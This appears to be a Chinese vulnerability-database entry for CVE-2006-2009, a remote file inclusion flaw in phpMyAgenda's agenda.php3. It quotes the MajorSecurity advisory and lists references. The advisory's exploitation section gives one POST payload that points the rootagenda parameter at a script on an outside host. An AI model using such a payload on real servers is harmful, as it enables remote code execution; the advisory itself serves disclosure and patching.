PHPMyAgenda Agenda.PHP3 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195223 漏洞类型 输入验证
发布时间 2006-04-25 更新时间 2006-04-26
CVE编号 CVE-2006-2009 CNNVD-ID CNNVD-200604-478
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006040108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-478
|漏洞详情
phpMyAgenda3.0Final及早期版本中的agenda.php3存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于rootagenda参数中的URL执行任意PHP代码。
|漏洞EXP
[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability 
--------------------------------------------------------
Software: phpMyAgenda
Version: 3.0 Final
Type: Remote File Include Vulnerability
Date: April, 24th 2006
Vendor: phpMyAgenda
Page: http://phpmyagenda.com
Risc: High

Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de

Affected Products:
----------------------------
phpMyAgenda 3.0 Final and prior

Description:
----------------------------
phpMyAgenda is a complete web application that allows you to manage 
and publish events (concert, meetings, etc...).
It stores description, dates, places, contacts, event registrations, and event polls.

Requirements:
----------------------------
register_globals = On

Vulnerability:
----------------------------
Input passed to the "rootagenda" parameter in "agenda.php3" is not
properly verified, before it is used to include files. 
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".

Exploitation:
----------------------------
Post data:
rootagenda=http://www.yourspace.com/yourscript.php?
|参考资料

来源:BID
名称:17670
链接:http://www.securityfocus.com/bid/17670
来源:BUGTRAQ
名称:20060424[MajorSecurity]phpMyAgenda3.0Final-RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431862/100/0/threaded
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt
来源:XF
名称:phpmyagenda-rootagenda-file-include(26062)
链接:http://xforce.iss.net/xforce/xfdb/26062
来源:BUGTRAQ
名称:20060515tyree[at]users.sourceforge.net
链接:http://www.securityfocus.com/archive/1/archive/1/433995/100/0/threaded
来源:OSVDB
名称:24943
链接:http://www.osvdb.org/24943
来源:VUPEN
名称:ADV-2006-1509
链接:http://www.frsirt.com/english/advisories/2006/1509
来源:SECTRACK
名称:1015984
链接:http://securitytracker.com/id?1015984
来源:SREASON
名称:787
链接:http://securityreason.com/securityalert/787
来源:SECUNIA
名称:19748
链接:http://secunia.com/advisories/19748
来源:MISC
链接:http://osvdb.org/ref/29/2914x-phpmyagenda.txt